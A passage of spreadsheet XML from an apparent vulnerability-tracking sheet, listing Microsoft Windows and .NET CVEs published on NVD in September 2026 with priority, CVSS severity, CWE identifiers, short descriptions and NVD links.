          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="D1411" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1411" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1411" s="5" t="inlineStr"/>
      <c r="H1411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1411" s="5" t="inlineStr"/>
      <c r="J1411" s="5" t="inlineStr"/>
      <c r="K1411" s="5" t="inlineStr"/>
      <c r="L1411" s="5" t="inlineStr"/>
      <c r="M1411" s="5" t="inlineStr"/>
      <c r="N1411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1411" s="5" t="inlineStr"/>
      <c r="Q1411" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1411" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="D1412" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1412" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1412" s="5" t="inlineStr"/>
      <c r="H1412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1412" s="5" t="inlineStr"/>
      <c r="J1412" s="5" t="inlineStr"/>
      <c r="K1412" s="5" t="inlineStr"/>
      <c r="L1412" s="5" t="inlineStr"/>
      <c r="M1412" s="5" t="inlineStr"/>
      <c r="N1412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1412" s="5" t="inlineStr"/>
      <c r="Q1412" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1412" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="D1413" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1413" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1413" s="5" t="inlineStr"/>
      <c r="H1413" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I1413" s="5" t="inlineStr"/>
      <c r="J1413" s="5" t="inlineStr"/>
      <c r="K1413" s="5" t="inlineStr"/>
      <c r="L1413" s="5" t="inlineStr"/>
      <c r="M1413" s="5" t="inlineStr"/>
      <c r="N1413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1413" s="5" t="inlineStr"/>
      <c r="Q1413" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R1413" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="D1414" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1414" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1414" s="5" t="inlineStr"/>
      <c r="H1414" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1414" s="5" t="inlineStr"/>
      <c r="J1414" s="5" t="inlineStr"/>
      <c r="K1414" s="5" t="inlineStr"/>
      <c r="L1414" s="5" t="inlineStr"/>
      <c r="M1414" s="5" t="inlineStr"/>
      <c r="N1414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1414" s="5" t="inlineStr"/>
      <c r="Q1414" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1414" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="D1415" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1415" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1415" s="5" t="inlineStr"/>
      <c r="H1415" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1415" s="5" t="inlineStr"/>
      <c r="J1415" s="5" t="inlineStr"/>
      <c r="K1415" s="5" t="inlineStr"/>
      <c r="L1415" s="5" t="inlineStr"/>
      <c r="M1415" s="5" t="inlineStr"/>
      <c r="N1415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1415" s="5" t="inlineStr"/>
      <c r="Q1415" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1415" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="D1416" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1416" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1416" s="5" t="inlineStr"/>
      <c r="H1416" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1416" s="5" t="inlineStr"/>
      <c r="J1416" s="5" t="inlineStr"/>
      <c r="K1416" s="5" t="inlineStr"/>
      <c r="L1416" s="5" t="inlineStr"/>
      <c r="M1416" s="5" t="inlineStr"/>
      <c r="N1416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1416" s="5" t="inlineStr"/>
      <c r="Q1416" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1416" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="D1417" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1417" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1417" s="5" t="inlineStr"/>
      <c r="H1417" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1417" s="5" t="inlineStr"/>
      <c r="J1417" s="5" t="inlineStr"/>
      <c r="K1417" s="5" t="inlineStr"/>
      <c r="L1417" s="5" t="inlineStr"/>
      <c r="M1417" s="5" t="inlineStr"/>
      <c r="N1417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1417" s="5" t="inlineStr"/>
      <c r="Q1417" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1417" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="D1418" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1418" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1418" s="5" t="inlineStr"/>
      <c r="H1418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1418" s="5" t="inlineStr"/>
      <c r="J1418" s="5" t="inlineStr"/>
      <c r="K1418" s="5" t="inlineStr"/>
      <c r="L1418" s="5" t="inlineStr"/>
      <c r="M1418" s="5" t="inlineStr"/>
      <c r="N1418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1418" s="5" t="inlineStr"/>
      <c r="Q1418" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1418" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="D1419" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1419" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1419" s="5" t="inlineStr"/>
      <c r="H1419" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I1419" s="5" t="inlineStr"/>
      <c r="J1419" s="5" t="inlineStr"/>
      <c r="K1419" s="5" t="inlineStr"/>
      <c r="L1419" s="5" t="inlineStr"/>
      <c r="M1419" s="5" t="inlineStr"/>
      <c r="N1419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1419" s="5" t="inlineStr"/>
      <c r="Q1419" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="R1419" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D1420" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1420" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1420" s="5" t="inlineStr"/>
      <c r="H1420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1420" s="5" t="inlineStr"/>
      <c r="J1420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1420" s="5" t="inlineStr"/>
      <c r="M1420" s="5" t="inlineStr"/>
      <c r="N1420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1420" s="5" t="inlineStr"/>
      <c r="Q1420" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1420" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D1421" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1421" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1421" s="5" t="inlineStr"/>
      <c r="H1421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1421" s="5" t="inlineStr"/>
      <c r="J1421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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21" s="5" t="inlineStr"/>
      <c r="M1421" s="5" t="inlineStr"/>
      <c r="N1421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1421" s="5" t="inlineStr"/>
      <c r="Q1421" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1421" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D1422" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1422" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1422" s="5" t="inlineStr"/>
      <c r="H1422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1422" s="5" t="inlineStr"/>
      <c r="J1422" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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22" s="5" t="inlineStr"/>
      <c r="M1422" s="5" t="inlineStr"/>
      <c r="N1422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1422" s="5" t="inlineStr"/>
      <c r="Q1422" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1422" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D1423" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1423" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1423" s="5" t="inlineStr"/>
      <c r="H1423" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1423" s="5" t="inlineStr"/>
      <c r="J1423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1423" s="5" t="inlineStr"/>
      <c r="M1423" s="5" t="inlineStr"/>
      <c r="N1423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1423" s="5" t="inlineStr"/>
      <c r="Q1423" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1423" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D1424" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1424" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1424" s="5" t="inlineStr"/>
      <c r="H1424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1424" s="5" t="inlineStr"/>
      <c r="J1424" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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24" s="5" t="inlineStr"/>
      <c r="M1424" s="5" t="inlineStr"/>
      <c r="N1424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1424" s="5" t="inlineStr"/>
      <c r="Q1424" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1424" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D1425" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1425" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1425" s="5" t="inlineStr"/>
      <c r="H1425" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1425" s="5" t="inlineStr"/>
      <c r="J1425" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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25" s="5" t="inlineStr"/>
      <c r="M1425" s="5" t="inlineStr"/>
      <c r="N1425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1425" s="5" t="inlineStr"/>
      <c r="Q1425" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1425" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D1426" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1426" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1426" s="5" t="inlineStr"/>
      <c r="H1426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1426" s="5" t="inlineStr"/>
      <c r="J1426" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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26" s="5" t="inlineStr"/>
      <c r="M1426" s="5" t="inlineStr"/>
      <c r="N1426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1426" s="5" t="inlineStr"/>
      <c r="Q1426" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="R1426" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D1427" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1427" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1427" s="5" t="inlineStr"/>
      <c r="H1427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1427" s="5" t="inlineStr"/>
      <c r="J1427" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K142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427" s="5" t="inlineStr"/>
      <c r="M1427" s="5" t="inlineStr"/>
      <c r="N1427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1427" s="5" t="inlineStr"/>
      <c r="Q1427" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1427" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D1428" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1428" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1428" s="5" t="inlineStr"/>
      <c r="H1428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1428" s="5" t="inlineStr"/>
      <c r="J1428" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K142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428" s="5" t="inlineStr"/>
      <c r="M1428" s="5" t="inlineStr"/>
      <c r="N1428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1428" s="5" t="inlineStr"/>
      <c r="Q1428" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1428" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D1429" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1429" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
